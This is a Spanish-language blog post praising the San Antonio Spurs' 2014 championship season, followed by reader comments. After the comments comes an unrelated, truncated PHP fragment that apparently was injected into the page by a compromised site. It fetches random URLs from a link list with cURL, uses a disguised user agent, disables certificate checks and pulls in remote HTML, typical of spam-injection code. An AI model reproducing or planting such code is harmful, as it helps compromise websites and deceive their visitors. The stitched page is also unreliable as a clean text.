San Antonio Spurs: Excelente Cum Laude

20 de August de 2014 por TheDeerHunter

Han vencido y convencido. En la era de titanes como LeBron James y Kevin Durant, de los Big threes y las ultra-poderosas combinaciones de estrellas, han sido los viejos Spurs, antaño fieros defensores del anti-baloncesto y del ganar de cualquier manera, los que han devuelto el baloncesto a sus principios más puros. Han tenido que ser ellos los que nos han recordado que éste sigue siendo el terreno del talento por encima del músculo, que el pase siempre es más veloz que la carrera y que es mejor buscar al compañero abierto antes que el jugadón imposible. Es así como uno se imagina que las leyendas clásicas enfrentarían, y quizá doblegarían, a los superhombres “digi-evolucionados” de la actualidad. La esencia de este juego y su principio más hermoso siempre fue el pase. Habría que extender al quinteto al completo aquella idea de que “una asistencia hace felices a 2” vistas las frecuentes jugadas “multi-pase” que seguro dejan a todos los partícipes la satisfacción de ser los puñeteros amos. Resulta irónico que Gregg Popovich, el gran azote de los primeros Kings de Adelman y de los Suns de D’Antoni y Nash, sea ahora el gran adalid de tal filosofía. El círculo se ha cerrado. ¿Volverá a imponerse esta concepción del baloncesto colectivo a partir de ahora? Eso será más difícil. 

Ésta es una historia de película, de superación llevada al máximo exponente. Un grupo de veteranos más cerca de la retirada que de sus mejores años, acaudillados por el típico viejo zorro de vuelta de todo, logran contra pronóstico alcanzar nuevamente la final del campeonato, quizá por última vez en sus vidas. Se enfrentan a un rival casi de laboratorio,  aparentemente invencible y liderado por el mejor jugador del mundo. Caen derrotados pero lejos de amedrentarse se conjuran para volver a intentarlo con mayor determinación aún. El final, previsible en el cine que no tanto en la realidad, es perfecto. En la revancha imponen claramente su espíritu colectivo, su solidaridad y generosidad y de paso dejan para la posteridad un nivel fabuloso, espectacular, como se suele decir “jugando de memoria”. La realidad supera a la ficción. Este “cuento de hadas” que, por cierto, aún no ha terminado, quedará especialmente grabado en nuestra retina pero para los Spurs es casi el pan de cada día. Llevan desde 1996, cuando contrataron a Gregg Popovich, tropezándose y levantándose, pero siempre reinventándose. Quizá por eso sean, globalmente, la mejor franquicia de los últimos 20 años con 5 anillos, un subcampeonato y 17 participaciones consecutivas en Playoffs, con el mérito añadido de no ser un gran mercado. Son una lección para todos aquellos que tendemos a anunciar finales de ciclo y a enterrar proyectos y jugadores.

La gran revolución sobre las corrientes predominantes durante los últimos lustros en la competición ha sido la de dotar de relevancia a cada uno de los miembros del equipo. En los sistemas de los Spurs, ofensivos y defensivos, son tan importantes los jugadores de calibre histórico como los que ocupan las últimas plazas de la rotación. Como en el ajedrez, cada pieza es clave. No tiene precedentes el hecho de que los hombres más utilizados por el campeón de conferencia no hayan disputado ni 30 minutos por partido. Este planteamiento sólo les ha generado ventajas. Para empezar el estado de forma impecable con el que llegaron al tramo decisivo del campeonato, teniendo en cuenta que eran un grupo excesivamente veterano y no demasiado físico. Después el tema psicológico, moral y confianza óptima en el vestuario. Cohesión casi familiar. No es fácil observar tal nivel de iniciativa y capacidad de decisión en todos. Sin menospreciar, no creemos que un hombre del perfil de Kawhi Leonard hubiera podido erigirse como MVP de unas finales en otras circunstancias. Sin duda el técnico tiene gran parte de culpa de todo esto, pero se ha beneficiado del beneplácito de los pesos pesados, capaces de sacrificar sus egos en favor de los intereses colectivos. King James lo reflejó muy bien en la derrota, admitiendo cierta envidia sana. Apunta a sentimiento general, ejemplo para el resto de la liga y quién sabe si motivo de reflexión.

En resumen. Dominaron con comodidad la regular, deslumbraron en su camino hasta el anillo, han abanderado los mejores valores del baloncesto y del deporte, han demolido la dinastía de los beach boys y se han convertido en la verdadera bestia negra de LeBron James… Una temporada antológica con la que ni los más entusiastas soñarían. Han escrito uno de los capítulos más épicos y emocionantes de la historia. No se puede pedir más.

PREMIOS

MVP: Sería injusto ante el mejor baloncesto colectivo del siglo XXI destacar a alguien por encima del resto. Lo que queda claro es que si se ejecuta de manera tan perfecta el juego de pase, no sólo es estéticamente extraordinario, sino también muy difícil de superar. El sistema es el verdadero ganador y, en este caso, las individualidades son secundarias.

Sorpresa: Sigo creyendo que no eran los mejores sobre el papel. No parecía el plantel más potente, ni el más completo, ni el de mayor talento… ni, por supuesto, el más joven. La evolución respecto al curso pasado, a un nivel ya tan elevado, escapa a la comprensión.

Decepción: Todo lo bueno se acaba. Disfrutémoslo mientras podamos. Por decir algo más, han sido demasiado buenos y eso ha repercutido en la longitud y emoción de las series ante Portland y, especialmente, ante Miami. Pedazo de abusones.

Esfuerzo en vano: El del resto de la liga, ante el despliegue imparable de estos Spurs. Eternos.

JUGANDO A GM

Es comprensible, e incluso habitual, que el campeón se refuerce poco o nada. En este caso es una excelente noticia mantener intacto el bloque que logró el anillo, habida cuenta de expirings como Mills y Diaw se habían revalorizado mucho y otros veteranos podían haberse planteado con cierta lógica la retirada. Sin embargo todos vuelven el curso que viene.

Así, los Spurs defenderán su trono con toda la artillería. Ahora sí, con el cartel de favoritos.

PG: Tony Parker, Patty Mills, Cory Joseph, Bryce Cotton
SG: Danny Green, Manu Ginobili, Marco Belinelli
SF: Kawhi Leonard, Austin Daye, Kyle Anderson
PF: Tim Duncan, Boris Diaw, DeMychal Green
C: Tiago Splitter, Matt Bonner, Jeff Ayres

Comenta

3 comentarios a esta entrada

  1. Lucho dice:
    #1

    Cuando se creó el basket supongo que se aspiraba a esto como el ideal
    “He visto a los Spurs de Pop”, simplemente. Tanto y tan poco como eso

    Creo que estos Spurs es la perfección y el basquet total, sincronica y diacronicame

      Citar

  2. Txusma dice:
    #2

    Enorme resumen Deer. Revisándo el artículo volvía a revivir las finales. Como dices, de película.

      Citar

  3. r_miller dice:
    #3

    Impresionantes, te tienes que rendir a ellos y a su manera de entender el baloncesto

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>